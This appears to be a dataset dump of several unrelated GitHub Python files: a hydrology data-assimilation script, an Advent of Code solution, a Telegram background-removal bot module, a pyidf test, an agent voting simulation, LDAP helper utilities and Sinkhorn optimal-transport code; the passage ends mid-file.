All sites by default.\nsites = select_sites(daisi_data.get_sites(), debug, nbatch, taskid)\n\n# Calibration periods\nperiods = daisi_data.Periods()\n\n#----------------------------------------------------------------------\n# Process\n#----------------------------------------------------------------------\nmodel = factory.model_factory(model_name)\nnsites = len(sites)\nperfs = []\n\nfor isite, (siteid, sinfo) in enumerate(sites.iterrows()):\n LOGGER.context = f\"{siteid} ({isite+1}/{nsites})\"\n\n LOGGER.info(\"Load data\")\n mthly = daisi_data.get_data(siteid)\n\n for objfun_name, calperiod in prod(objfun_names, calperiods):\n LOGGER.info(\"\")\n LOGGER.info(f\"{objfun_name} - Period {calperiod}\")\n\n # Assimilation output folder\n fassim = fout / f\"assim_{objfun_name}\"\n fassim.mkdir(exist_ok=True)\n\n fimg = fassim / \"images\"\n fimg.mkdir(exist_ok=True)\n\n # Instanciate model\n model = gr2m_update.GR2MUPDATE()\n\n # Set transform\n model.lamQ = lamQ\n model.lamP = lamP\n model.lamE = lamE\n model.nu = nu\n\n # Calibration period\n calp = periods.get_periodset(calperiod)\n idxcal = calp.total.select_index(mthly.index)\n idxcal_active = calp.active.select_index(mthly.index)[idxcal]\n\n # Get streamflow data during calib\n Qobs = mthly.Qobs.loc[idxcal]\n Qobs[~idxcal_active] = np.nan\n Qobscal = Qobs.copy()\n\n obs = pd.DataFrame({\"Q\": Qobs})\n obscal = pd.DataFrame({\"Q\": Qobscal})\n\n # Initialise GR2M model using calibrated parameters\n model.allocate(mthly.loc[idxcal, [\"Rain\", \"Evap\"]])\n\n # .. get calibrated parameters\n fp = fcalib / f\"calibration_{objfun_name}\" / \\\n f\"sim_{objfun_name}_{siteid}_{calperiod}.json\"\n with fp.open(\"r\") as fo:\n params = json.load(fo)\n\n X1 = params[\"PARAM_GR2M_X1\"]\n X2 = params[\"PARAM_GR2M_X2\"]\n Xr = 60.\n\n model.X1 = X1\n model.X2 = X2\n model.Xr = Xr\n\n model.initialise_fromdata()\n\n LOGGER.info(\"Run ENKS\")\n # .. create ensmooth object\n ensmooth = gr2m_ensmooth.EnSmooth(model, \\\n obscal, stdfacts, debug, nens)\n\n # .. configure plotting\n ensmooth.plot_dir = fimg\n ensmooth.plot_ax_size = (20, 3)\n ensmooth.plot_freq = 1000\n y1 = calp.active.end.year-5\n y2 = calp.active.end.year\n ensmooth.plot_period = [y1, y2]\n\n # .. initialise object\n ensmooth.initialise()\n\n context = f\"{siteid}_{objfun_name}_{calperiod}\"\n message = f\"EnSmooth {siteid} ({isite+1}/{nsites}) \"+\\\n f\"{objfun_name}-{calperiod}\"\n ensmooth.run(context, message)\n\n # Retrive key data from ensmooth\n nstates, nens, Xa = ensmooth.nstates_assim, ensmooth.nens, ensmooth.Xa\n sims0 = ensmooth.sims0\n transQ = ensmooth.transQ\n transP = ensmooth.transP\n transE = ensmooth.transE\n cols = [f\"Ens{iens:03d}\" for iens in range(nens)]\n iQ = ensmooth.assim_states.index(\"Q\")\n\n meta = {\n \"INFO_siteid\": int(siteid), \\\n \"INFO_calperiod\": calperiod, \\\n \"INFO_objfun\": objfun_name, \\\n \"INFO_nens\": nens, \\\n \"CONFIG_lamQ\": transQ.lam,\\\n \"CONFIG_nuQ\": transQ.nu,\\\n \"CONFIG_lamE\": transE.lam,\\\n \"CONFIG_nuE\": transE.nu,\\\n \"CONFIG_lamP\": transP.lam,\\\n \"CONFIG_nuP\": transP.nu,\\\n \"CONFIG_alphae\": alphae, \\\n \"PARAM_GR2M_X1\": X1, \\\n \"PARAM_GR2M_X2\": X2, \\\n \"PARAM_GR2M_Xr\": Xr\n }\n\n LOGGER.info(\"Store - Xa\")\n snames = ensmooth.assim_states\n nparams = 0 # no parameter assim\n\n # .. 
back transform corrected state data to\n # facilitate data interpretation\n if \"P\" in snames:\n iP = snames.index(\"P\")\n Xa[nparams+iP::nstates] = \\\n transP.backward(Xa[nparams+iP::nstates]) #P\n\n if \"P3\" in snames:\n iP3 = snames.index(\"P3\")\n Xa[nparams+iP3::nstates] = \\\n transP.backward(Xa[nparams+iP3::nstates]) #P3\n\n if \"E\" in snames:\n iE = snames.index(\"E\")\n Xa[nparams+iE::nstates] = \\\n transP.backward(Xa[nparams+iE::nstates]) #E\n\n if \"AE\" in snames:\n iAE = snames.index(\"AE\")\n Xa[nparams+iAE::nstates] = \\\n transE.backward(Xa[nparams+iAE::nstates]) #AE\n\n HXa = Xa[nparams+iQ::nstates]\n Xa[nparams+iQ::nstates] = transQ.backward(HXa) #Q\n Xa = pd.DataFrame(Xa, columns=cols)\n time = np.repeat(Qobs.index, nstates)\n Xa.loc[:, \"time\"] = time\n\n sn = np.repeat(np.array(snames)[None, :], len(HXa), axis=0).ravel()\n Xa.loc[:, \"state\"] = sn\n\n fn = f\"ensmooth_Xa_{siteid}_{calperiod}.csv\"\n fxa = fassim / fn\n comment = {\"comment\": \"Enks Xa data\"}\n comment.update(meta)\n csv.write_csv(Xa, fxa, comment, \\\n source_file, write_index=True)\n\n # Process openloop\n LOGGER.info(\"Store - Xf\")\n tend = (Xa.shape[0]-nparams)//nstates\n Xf = ensmooth.openloop(0, tend)\n\n if \"P\" in snames:\n Xf[iP::nstates] = transP.backward(Xf[iP::nstates]) #P\n\n if \"P3\" in snames:\n Xf[iP3::nstates] = transP.backward(Xf[iP3::nstates]) #P3\n\n if \"E\" in snames:\n Xf[iE::nstates] = transE.backward(Xf[iE::nstates]) #E\n\n if \"AE\" in snames:\n Xf[iAE::nstates] = transE.backward(Xf[iAE::nstates]) #AE\n\n HXf = Xf[iQ::nstates]\n Xf[iQ::nstates] = transQ.backward(HXf) #Q\n Xf = pd.DataFrame(Xf, columns=cols)\n Xf.loc[:, \"time\"] = time[nparams:]\n Xf.loc[:, \"state\"] = sn[nparams:]\n\n fn = f\"ensmooth_Xf_{siteid}_{calperiod}.csv\"\n fxf = fassim / fn\n comment = {\"comment\": \"Enks Xf data\"}\n comment.update(meta)\n csv.write_csv(Xf, fxf, comment, \\\n source_file, write_index=True)\n\n # HXa\n LOGGER.info(\"Store - HXa\")\n HXa = pd.DataFrame(HXa, index=Qobs.index, columns=cols)\n HXa.loc[:, \"Qobs\"] = Qobs\n HXa.loc[:, \"Qsim\"] = sims0.Q.values\n HXa.loc[:, \"P3sim\"] = sims0.P3.values\n HXa.loc[:, \"Ssim\"] = sims0.S.values\n HXa.loc[:, \"Rsim\"] = sims0.R.values\n HXa.loc[:, \"Rain\"] = model.inputs[:, 0]\n HXa.loc[:, \"Evap\"] = model.inputs[:, 1]\n\n HXa.loc[:, \"ISCAL\"] = 0\n HXa.loc[idxcal_active, \"ISCAL\"] = 1\n\n ens = HXa.filter(regex=\"Ens\", axis=1)\n obs = HXa.Qobs\n _, nrmse, ksp, pits = daisi_perf.ensemble_metrics(obs, ens)\n log10ksp = math.log10(max(1e-10, ksp))\n\n perfs.append({\"siteid\": siteid, \"calperiod\": calperiod, \\\n \"objfun\": objfun_name, \\\n \"nrmse\": nrmse, \"ksp\": ksp})\n\n LOGGER.info(f\"DAPERF: NR={nrmse:0.2f} KS={ksp:2.2e}\")\n\n fhxa = fxa.parent / f\"{re.sub('Xa', 'HXa', fxa.stem)}.csv\"\n comment = {\\\n \"comment\": \"Enks HXa data\", \\\n \"METRIC_CAL_NRMSERATIO-DA\": nrmse, \\\n \"METRIC_CAL_KSLOG10PV-DA\":log10ksp, \\\n }\n comment.update(meta)\n csv.write_csv(HXa, fhxa, comment, \\\n source_file, write_index=True)\n\n\n# Store results\nperfs = pd.DataFrame(perfs)\nfr = fout / f\"assim_results.csv\"\ncsv.write_csv(perfs, fr, \"Data Assimilation results\", \\\n source_file, compress=False, line_terminator=\"\\n\")\n\n\nLOGGER.info(\"Process 
completed\")\n\n","repo_name":"csiro-hydroinformatics/pydaisi","sub_path":"scripts/STEP1_data_assimilation.py","file_name":"STEP1_data_assimilation.py","file_ext":"py","file_size_in_byte":11066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36213486617","text":"with open(\"input\", \"r\") as input:\n lines = input.readlines()\n two_letters = 0\n three_letters = 0\n\n for line in lines:\n mod_2 = 0\n mod_3 = 0\n for i in range(ord('a'), ord('z') + 1):\n if line.count(str(chr(i))) == 2 and mod_2 == 0:\n two_letters += 1\n mod_2 = 1\n\n if line.count(str(chr(i))) == 3 and mod_3 == 0:\n three_letters += 1\n mod_3 = 1\n\nprint(two_letters * three_letters)\n ","repo_name":"Jokeswar/advent-of-code-2018","sub_path":"day-2/task-1.py","file_name":"task-1.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1215854936","text":"from Luna import CMD_HELP\nfrom Luna import tbot\nimport io\nimport os\nimport asyncio\nfrom datetime import datetime\n\nimport requests\nfrom telethon import types\nfrom telethon.tl import functions\nfrom Luna import REM_BG_API_KEY\nfrom Luna import TEMP_DOWNLOAD_DIRECTORY\nfrom Luna.events import bot as register\n\n@register(pattern=\"^/rmbg\")\nasync def _(event):\n HELP_STR = \"use `/rmbg` as reply to a media\"\n if event.fwd_from:\n return\n if REM_BG_API_KEY is None:\n await event.reply(\"You need API token from remove.bg to use this plugin.\")\n return False\n start = datetime.now()\n message_id = event.message.id\n if event.reply_to_msg_id:\n message_id = event.reply_to_msg_id\n reply_message = await event.get_reply_message()\n k = await event.reply(\"Processing...\")\n try:\n downloaded_file_name = await tbot.download_media(\n reply_message, TEMP_DOWNLOAD_DIRECTORY\n )\n except Exception as e:\n await event.reply(str(e))\n return\n else:\n output_file_name = ReTrieveFile(downloaded_file_name)\n os.remove(downloaded_file_name)\n else:\n await event.reply(HELP_STR)\n return\n contentType = output_file_name.headers.get(\"content-type\")\n if \"image\" in contentType:\n with io.BytesIO(output_file_name.content) as remove_bg_image:\n remove_bg_image.name = \"rmbg.png\"\n await tbot.send_file(\n event.chat_id,\n remove_bg_image,\n force_document=True,\n supports_streaming=False,\n allow_cache=False,\n reply_to=message_id,\n )\n await k.delete()\n end = datetime.now()\n ms = (end - start).seconds\n m = await event.reply(\"Background Removed in {} seconds\".format(ms))\n await asyncio.sleep(3)\n await m.delete()\n else:\n await event.reply(\n \"remove.bg API returned Errors. 
Please report to @lunabotsupport\\n`{}\".format(\n output_file_name.content.decode(\"UTF-8\")\n )\n )\n\n\ndef ReTrieveFile(input_file_name):\n headers = {\n \"X-API-Key\": REM_BG_API_KEY,\n }\n files = {\n \"image_file\": (input_file_name, open(input_file_name, \"rb\")),\n }\n r = requests.post(\n \"https://api.remove.bg/v1.0/removebg\",\n headers=headers,\n files=files,\n allow_redirects=True,\n stream=True,\n )\n return r\n\n\nfile_help = os.path.basename(__file__)\nfile_help = file_help.replace(\".py\", \"\")\nfile_helpo = file_help.replace(\"_\", \" \")\n\n__help__ = \"\"\"\n - /rmbg: Type in reply to a media to remove it's background\n\"\"\"\n\nCMD_HELP.update({file_helpo: [file_helpo, __help__]})\n","repo_name":"TheUnknownKanger/TimePassAssistantBot","sub_path":"Luna/modules/RMBG.py","file_name":"RMBG.py","file_ext":"py","file_size_in_byte":2764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9799012658","text":"import os\nimport tempfile\nimport unittest\nimport logging\nfrom pyidf import ValidationLevel\nimport pyidf\nfrom pyidf.idf import IDF\nfrom pyidf.plant_heating_and_cooling_equipment import PlantComponentTemperatureSource\n\nlog = logging.getLogger(__name__)\n\nclass TestPlantComponentTemperatureSource(unittest.TestCase):\n\n def setUp(self):\n self.fd, self.path = tempfile.mkstemp()\n\n def tearDown(self):\n os.remove(self.path)\n\n def test_create_plantcomponenttemperaturesource(self):\n\n pyidf.validation_level = ValidationLevel.error\n\n obj = PlantComponentTemperatureSource()\n # alpha\n var_name = \"Name\"\n obj.name = var_name\n # node\n var_inlet_node = \"node|Inlet Node\"\n obj.inlet_node = var_inlet_node\n # node\n var_outlet_node = \"node|Outlet Node\"\n obj.outlet_node = var_outlet_node\n # real\n var_design_volume_flow_rate = 0.0001\n obj.design_volume_flow_rate = var_design_volume_flow_rate\n # alpha\n var_temperature_specification_type = \"Constant\"\n obj.temperature_specification_type = var_temperature_specification_type\n # real\n var_source_temperature = 6.6\n obj.source_temperature = var_source_temperature\n # object-list\n var_source_temperature_schedule_name = \"object-list|Source Temperature Schedule Name\"\n obj.source_temperature_schedule_name = var_source_temperature_schedule_name\n\n idf = IDF()\n idf.add(obj)\n idf.save(self.path, check=False)\n\n with open(self.path, mode='r') as f:\n for line in f:\n log.debug(line.strip())\n\n idf2 = IDF(self.path)\n self.assertEqual(idf2.plantcomponenttemperaturesources[0].name, var_name)\n self.assertEqual(idf2.plantcomponenttemperaturesources[0].inlet_node, var_inlet_node)\n self.assertEqual(idf2.plantcomponenttemperaturesources[0].outlet_node, var_outlet_node)\n self.assertAlmostEqual(idf2.plantcomponenttemperaturesources[0].design_volume_flow_rate, var_design_volume_flow_rate)\n self.assertEqual(idf2.plantcomponenttemperaturesources[0].temperature_specification_type, var_temperature_specification_type)\n self.assertAlmostEqual(idf2.plantcomponenttemperaturesources[0].source_temperature, var_source_temperature)\n self.assertEqual(idf2.plantcomponenttemperaturesources[0].source_temperature_schedule_name, var_source_temperature_schedule_name)","repo_name":"rbuffat/pyidf","sub_path":"tests/test_plantcomponenttemperaturesource.py","file_name":"test_plantcomponenttemperaturesource.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"68"} 
+{"seq_id":"74113797655","text":"from agent import Agent\nimport numpy as np\nimport networkx as nx\nfrom matplotlib import pyplot as plt\nimport matplotlib.patches as mpatches\nimport matplotlib.animation\n\nclass IntelligentAgent():\n\n def __init__(self, conn_index, util_matrix):\n #agent index\n self.conn_index = conn_index\n self.util_matrix = util_matrix\n\n def MEU(self, conn_matrix, agents_decisions):\n \"\"\"\n \"\"\"\n utilities = []\n m, n = self.util_matrix.shape\n agent_count = len(conn_matrix[0, :])\n\n for decision_idx in range(m):\n utility = 0\n for i, conn_strength in enumerate(conn_matrix[self.conn_index, :]):\n other_agent_decision_idx = agents_decisions[i]\n utility += conn_strength * self.util_matrix[decision_idx, other_agent_decision_idx]\n\n utilities.append(utility)\n return np.argmax(utilities)\n\ndef update_agents_decision(conn_matrix, agents, agents_decisions):\n new_agents_decisions = []\n for i, decision in enumerate(agents_decisions): \n new_agents_decisions.append(\n agents[i].MEU(conn_matrix, agents_decisions)\n )\n #sanity check for animation update\n #new_agents_decisions[2] = np.random.randint(2, size=10)\n return new_agents_decisions\n\n\ndef animate(conn_matrix, agents, agents_decisions):\n G = nx.from_numpy_matrix(conn_matrix)\n pos = nx.spring_layout(G)\n n = len(conn_matrix[:, 0])\n fig, ax = plt.subplots(figsize=(6,4))\n \n def update(num):\n ax.clear()\n nonlocal agents_decisions\n color_map = []\n for x in agents_decisions:\n if x == 0: \n color_map.append(\"red\")\n elif x == 1:\n color_map.append(\"blue\")\n else:\n color_map.append(\"white\")\n \n nx.draw(\n G, pos, edge_color='black',width=1,linewidths=1,\\\n node_size=500, node_color = color_map , alpha=0.9,\\\n labels={node:node for node in G.nodes()}\n )\n\n edge_labels = {(j, i):conn_matrix[i, j] for j in range(n) for i in range(n)}\n nx.draw_networkx_edge_labels(G, pos, edge_labels=edge_labels, font_color='red')\n\n agents_decisions = update_agents_decision(conn_matrix, agents, agents_decisions)\n\n ani = matplotlib.animation.FuncAnimation(fig, update, interval=1000, repeat=True)\n plt.axis('off')\n plt.show()\n\n\ndef test():\n conn_matrix = np.array([\n [0, 2, 1], #ballot cast for self so inf\n [2, 0, 3], #influence/conn on self is zero since undecided\n [1, 3, 0] \n ])\n agents_decisions = np.array([\n 0, #dem vote\n -1, #curr agent undecided -- doenst really since self influence is zero on conn_matrix\n 1 #rep vote\n ])\n dominator = 100000\n #util matrix doesnt need to take into account utility of other agent\n #and so only needs be a 2x2 matrix\n und_util_matrix = np.array([\n [2, 1],\n [1, 1]\n ])\n rep_util_matrix = np.array([\n [0, 0],\n [dominator, dominator]\n ])\n dem_util_matrix = np.array([\n [dominator, dominator],\n [0, 0]\n ])\n\n agent_0 = IntelligentAgent(0, dem_util_matrix)\n agent_1 = IntelligentAgent(1, und_util_matrix)\n agent_2 = IntelligentAgent(2, rep_util_matrix)\n\n agents = [agent_0, agent_1, agent_2]\n\n assert agent_1.MEU(conn_matrix, agents_decisions) == 0\n assert np.allclose(update_agents_decision(conn_matrix, agents, agents_decisions), np.array([0, 0, 1]))\n print(\"SUCCESS: MEU\")\n\n animate(conn_matrix, agents, agents_decisions)\n\n\ntest()","repo_name":"tsor13/diffusion-of-information","sub_path":"IntelligentAgent.py","file_name":"IntelligentAgent.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18772777461","text":"import ldap,logging\n\n# URI 
format definition: http://tools.ietf.org/html/rfc4516.html\ndef initialize_source(uri,admin_dn,password):\n l = None\n try:\n l = ldap.initialize(uri)\n l.simple_bind_s(admin_dn,password)\n logging.info('LDAP: opened connection to %s binding as %s',uri,admin_dn)\n except Exception as e:\n logging.critical('LDAP: caught exception: %s',repr(e))\n logging.critical('LDAP: failed to open connection to %s binding as %s',uri,admin_dn)\n return l\n\n# create a DN for a CN by joining it to the base DN\n# there is probably a better method, but this works for extant test cases\ndef join_cn_base(base,cn):\n dn = 'CN=%s'%cn\n dn += ', ' + base\n return dn\n\n# delete a DN\ndef del_dn(ldap_source, dn):\n success = False\n try:\n result = ldap_source.delete_s(dn)\n success = True\n logging.info('LDAP: deleted %s',dn)\n except Exception as e:\n #import code; code.interact(local=locals())\n logging.critical('LDAP: caught exception: %s',e)\n logging.critical('LDAP: unable to delete %s',dn)\n return success\n\n# given a CN and base DN, delete the object\ndef del_cn(ldap_source, base_dn, cn):\n dn = join_cn_base(base_dn,cn)\n return del_dn(ldap_source,dn)\n\n# what gets opened must get closed\ndef close_source(ldap_source):\n uri = ldap_source._uri\n ldap_source.unbind_s()\n logging.info('LDAP: closed connection to %s',uri)\n\n#########################################################################\n# this stuff is all old / weird / should be deprecated #\n# it is only being kept for customer-maryland repo compat #\n# #\n# it should probably be using the accessor methods to parse return vals #\n# instead of crazy array / dict slicing #\n#########################################################################\ndef get_ldap_attr(o,ldfilter,attr,l):\n result = None\n temp = l.search_s(o,ldap.SCOPE_SUBTREE,ldfilter,['dn',attr])\n if temp!=None:\n try:\n result = temp[0][1][attr][0]\n except Exception as e:\n logging.debug('caught exception: %s',repr(e))\n logging.debug('no %s attribute for filter %s',attr,ldfilter)\n return result\n\ndef get_ldap_attr_by_cn(o,cn,attr,l):\n cnfilter = '(cn=%s)' % cn\n return get_ldap_attr(o,cnfilter,attr,l)\n\ndef get_cns_in_filter(o,ldfilter,l):\n cns = None\n results = l.search_s(o,ldap.SCOPE_SUBTREE,ldfilter,['cn','dn'])\n if results!=None:\n try:\n cns = [x[1]['cn'][0] for x in results]\n except Exception as e:\n logging.debug('caught exception: %s',repr(e))\n logging.debug('no matches for filter %s',ldfilter)\n return cns\n\ndef get_cns_in_edirgroup(o,group,l):\n group_filter = '(groupMembership=%s)' % group\n return get_cns_in_filter(o,group_filter,l)\n#########################################################################\n#########################################################################\n","repo_name":"gfakes/vcloud","sub_path":"harbinger/general-et/ldaputils.py","file_name":"ldaputils.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14521974845","text":"import mkl_fft\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport scipy as sp\nfrom scipy.spatial.distance import cdist\nfrom scipy.linalg import toeplitz\nfrom tqdm import tqdm\nimport IPython.display\nfrom time import time\n\n\ndef sinkhorn(X, Y, beta=0.01, max_iter=200, store_err=True, early_stopping=True, \n eps=1e-12, tol=1e-10, patience=10, verbose=True, plot_err=False, plot_mat=False,\n testtime=False, return_err=False):\n '''\n X, Y - datapoint of two distributions\n beta - regularization parameter \n \n 
return: K, a, b\n '''\n n, m = len(X), len(Y)\n C = cdist(X, Y)\n # C /= C.max()\n \n p = np.ones(n) / n\n q = np.ones(m) / m\n \n K = np.exp(-C / beta)\n Kt = K.T\n b = np.ones(m)\n \n i = 0\n j = 0\n err = [10]\n t = []\n print('Starting iterative process')\n \n for i in range(max_iter):\n with np.errstate(divide='ignore', invalid='ignore'):\n s = time()\n Kb = K.dot(b)\n a = np.divide(p, Kb)\n Kta = Kt.dot(a)\n b = np.divide(q, Kta)\n t.append(time() - s)\n if store_err:\n g0 = a * K.dot(b)\n g1 = b * Kt.dot(a)\n err.append(np.linalg.norm(g0 - p) + np.linalg.norm(g1 - q))\n ###########################################################\n if verbose == 2:\n print(f'{i:5.0f}: {err[-1]:.20f}')\n if plot_err == 2:\n IPython.display.clear_output(wait=True)\n plt.figure(figsize=(10,4))\n plt.title(f'error rate, {np.mean(t)*1000:3.3f} (±{np.std(t)*1000:1.1e}) ms per iteration, step {np.abs(err[-2] - err[-1]):.3e}')\n plt.semilogy(range(len(err)-1), err[1:])\n plt.show()\n \n if early_stopping:\n # if good enough\n if err[-1] < eps:\n if verbose:\n print(f'#iterations={i+1}, early stopping: eps, err={err[-1]:.5e}, {np.mean(t)*1000:3.3f} (±{np.std(t)*1000:1.1e}) ms per iteration')\n break\n # if no improvements\n if np.abs(err[-2] - err[-1]) < tol:\n j += 1\n if j > patience:\n if verbose:\n print(f'#iterations={i+1}, early stopping: tol, err={err[-1]:.5e}, {np.mean(t)*1000:3.3f} (±{np.std(t)*1000:1.1e}) ms per iteration')\n break\n else:\n j = 0\n else:\n if verbose:\n print(f'#iterations={i+1}, err={err[-1]:.5e}, {np.mean(t)*1000:3.3f} (±{np.std(t)*1000:1.1e}) ms per iteration')\n if store_err and plot_err == 1:\n plt.figure(figsize=(10,4))\n plt.subplot(121)\n plt.title('error')\n plt.semilogy(range(len(err)-1), err[1:])\n if plot_mat: plt.subplot(122)\n elif plot_mat:\n plt.figure(figsize=(5,4))\n if plot_mat:\n plt.title('optimal transport matrix')\n plt.imshow(a.reshape(-1,1) * K * b.reshape(1,-1))\n if plot_mat or plot_err: plt.show()\n method='sinkhorn'\n np.save(f'K_{method}.npy', K)\n np.save(f'a_{method}.npy', a)\n np.save(f'b_{method}.npy', b)\n if testtime:\n if return_err:\n return K, a, b, t, err\n else:\n return K, a, b, t\n else:\n if return_err:\n return K, a, b, err\n else:\n return K, a, b\n\ncenters = lambda edges: (edges[:,:-1] + edges[:,1:]) / 2\n\ndef binning(X, Y, bin_size):\n '''\n X, Y: nd.array,\n data points of two distributions\n bin_size: int,\n number of bins (equal for each dimension!)\n '''\n \n clouds = np.vstack([X, Y])\n \n grid = np.linspace(np.min(clouds, 0), np.max(clouds, 0), bin_size + 1).T # [Dimension, Bins]\n \n mesh = np.meshgrid(*centers(grid), indexing='xy')\n bins = np.hstack([x.reshape(-1,1) for x in mesh])\n \n p, _ = np.histogramdd(X, bins=grid)\n q, _ = np.histogramdd(Y, bins=grid)\n p /= p.sum()\n q /= q.sum()\n \n return bins, p, q\n\nis_pow_2 = lambda x: x == 2 ** int(np.log2(x))\n\nclass Toeplitz(object):\n '''Class for utilizing Toeplitz matrix (assume it is symmetric and has block-level no more than 3)'''\n def __init__(self, top, size=None):\n '''\n \n top: nd.array, \n the first row of the matrix, that defines the matrix; if 'size' is None, then assume that \n shape of the array defines the block-level structure.\n size: tuple of int or None, \n defines block-level structure, i.e. 
number of dimensions equals to level of matrix,\n each size of dimension is number of blocks of each level and size of last dimension is block size.\n Any size needs to be a power of 2.\n '''\n self.top = top if size is None else top.reshape(size)\n self.size = top.shape if size is None else size\n self.dim = len(self.size)\n self.area = tuple(slice(s) for s in self.size)\n self.pad = tuple((0, s) for s in self.size)\n \n assert all([is_pow_2(s) for s in self.size]), 'sizes need to be powers of 2'\n \n self.embedding = self.make_embedding(self.top)\n self.circ_fft = mkl_fft.fftn(self.embedding)\n \n def make_embedding(self, top):\n blocks = top\n for i in range(-1, -self.dim - 1, -1):\n zeros_size = list(self.size)\n for j in range(i, 0):\n if j == i:\n zeros_size[j] = 1\n else:\n zeros_size[j] *= 2\n slice_ = [slice(None) for _ in range(self.dim)]\n slice_[i] = slice(None, 0, -1)\n blocks = np.concatenate([blocks, np.zeros(zeros_size), blocks[tuple(slice_)]], i)\n return blocks\n \n def matvec(self, x, debug=True):\n ''' fast \"matvec\" multiplication '''\n if x.ndim > 1:\n if (x.shape[0] == 1 or x.shape[1] == 1):\n x = x.ravel()\n else:\n raise ValueError()\n x_fft = mkl_fft.fftn(np.pad(x.reshape(self.size), self.pad))\n if debug:\n print('*'*100)\n print('circ_fft\\n', self.circ_fft)\n print('x_fft\\n', x_fft)\n print('multiplication\\n', self.circ_fft * x_fft)\n print('ifft\\n', mkl_fft.ifftn(self.circ_fft * x_fft))\n print('result\\n', np.abs(mkl_fft.ifftn(np.multiply(self.circ_fft, x_fft))[self.area]).ravel())\n print('*'*100)\n return np.real(mkl_fft.ifftn(np.multiply(self.circ_fft, x_fft))[self.area]).ravel()\n \n def full(self):\n ''' \n return full matrix np.exp(-C / beta) without recomputation\n actually just the way to construct BTTB matrix of level 1, 2, 3 (N can be done also)\n '''\n if self.dim == 1:\n return toeplitz(self.top)\n if self.dim == 2:\n blocks = np.array([toeplitz(c) for c in self.top])\n elif self.dim == 3:\n Bblocks = [[toeplitz(c) for c in top2level] for top2level in self.top]\n blocks = np.array([np.block([[*blocks]] + [[*blocks[slice(i, 0, -1)], *blocks[slice(0,-i)]] \\\n for i in range(1, len(blocks))]) for blocks in Bblocks])\n else:\n raise NotImplementedError()\n return np.block([[*blocks]] + [[*blocks[slice(i, 0, -1)], *blocks[slice(0,-i)]] for i in range(1, len(blocks))])\n \n def distance_matrix(self, beta, full=None):\n return - beta * np.log(self.full() if full is None else full)\n \n def sinkhorn_distance(self, a, b, beta):\n ''' for now the full matrix is used '''\n K = self.full()\n return np.sum(a * K * b.reshape(1, -1) * self.distance_matrix(beta, K))\n\n\ndef sinkhorn_toeplitz(X, Y, bin_size, beta=0.01, max_iter=200,\n warm_start=None,\n early_stopping=True, eps=1e-12, tol=1e-10, patience=10, \n verbose=True, store_err=True, plot=0, \n debug=False, debug_=False, testtime=False, return_err=False):\n '''\n Arguments\n \n X, Y:\n ndarray:\n if bin_size is int: datapoints of two distributions\n if bin_size is ndarray: mass distributions over bins for two distributions\n bin_size:\n int: number of bins (equal for each dimension) for binning,\n ndarray: array of size [N, D] with coordinates of bin centers\n beta:\n float: entropy regularization parameter \n max_iter:\n int: maximal number of iterations\n warm_start:\n (ndarray, ndarray): a, b to start with\n early_stopping:\n bool: whether to stop iterations if the error $E(\\gamma)$ value \n matches the conditions (eps, tol, patience):\n $E(\\gamma) = ||\\gamma @ 1 - p||_2 + ||\\gamma^T @ 1 - 
q||_2\n eps:\n float: stops iterations if $E(\\gamma)$ < eps\n tol:\n float: stops after |patience| iterations with $E(\\gamma)_i - $E(\\gamma)_{i-1}$ < tol\n patience:\n int: number of iterations that can be computed with tol progress until early stopping\n verbose:\n 0, 1, 2 (or bool): controls the verbosity:\n 0 (False): nothing to be printed\n 1 (True): print stopping criteria or/and final error\n 2: print every iteration error\n store_err:\n bool: whether to calculate $E(\\gamma)$ (if False, then early_stopping is ignored)\n plot:\n 0, 1, 2 (or bool): whether to plot error linegraph (if store_err is True)\n 0 (False): nothing to be plotted\n 1 (True): one plot after finished iteration process\n 2: real-time plot during iteration process\n \n Return\n K: \n Toeplitz\n a, b, bins, p, q:\n ndarrays, (B, 1), (B, 1), (B, d), (B, 1), (B, 1), where B is overall number of bins\n \n '''\n if isinstance(bin_size, int):\n bins, p, q = binning(X, Y, bin_size)\n elif isinstance(bin_size, np.ndarray):\n bins, p, q = bin_size.copy(), X.copy(), Y.copy()\n p /= p.sum()\n q /= q.sum()\n else:\n raise ValueError()\n \n size = p.shape\n p = p.ravel() + 1e-15\n q = q.ravel() + 1e-15\n top = cdist(bins[0].reshape(1, -1), bins) # O(B)\n # top /= top.max()\n K = Toeplitz(np.exp(- top / beta), size)\n if debug_:\n C = cdist(bins, bins)\n K_ = np.exp(-C / beta)\n if warm_start is None:\n b = np.ones(np.prod(size))\n else:\n a, b = warm_start\n \n i = 0\n j = 0\n err = [10]\n t = []\n print('Starting iterative process')\n \n for i in range(max_iter):\n \n with np.errstate(divide='raise', over='raise', under='raise'):\n try:\n if debug or debug_:\n print(f'ITERATION {i}')\n print('-'*100)\n s = time()\n if debug: print('MATVEC by b\\n b =\\n', b)\n Kb = K.matvec(b, debug) # O(B log B)\n if debug_:\n K_b = K_ @ b\n print('.'*100)\n print(\"\\nISCLOSE TO REAL MATVEC:\", np.all(np.isclose(K_b, Kb, 1e-10)), \n '\\n\\tabs(diff).mean', np.abs(K_b - Kb).mean(),\n '\\n\\tabs(diff).mean / abs(K_b).mean', np.abs(K_b - Kb).mean() / np.abs(K_b).mean())\n print('.'*100)\n \n if debug: print(f'DIVIDING p by K.b\\n p =\\n{p}\\n K.b =\\n', Kb)\n a = np.divide(p, Kb)\n if debug: print('MATVEC by a\\n a =\\n', a)\n Ka = K.matvec(a, debug) # O(B log B)\n \n if debug_:\n K_a = K_ @ a\n print('.'*100)\n print(\"\\nISCLOSE TO REAL MATVEC:\", np.all(np.isclose(K_a, Ka, 1e-10)), \n '\\n\\tabs(diff).mean', np.abs(K_a - Ka).mean(),\n '\\n\\tabs(diff).mean / abs(K_a).mean', np.abs(K_a - Ka).mean() / np.abs(K_a).mean())\n print('.'*100)\n \n if debug: print(f'DIVIDING q by K.a\\n 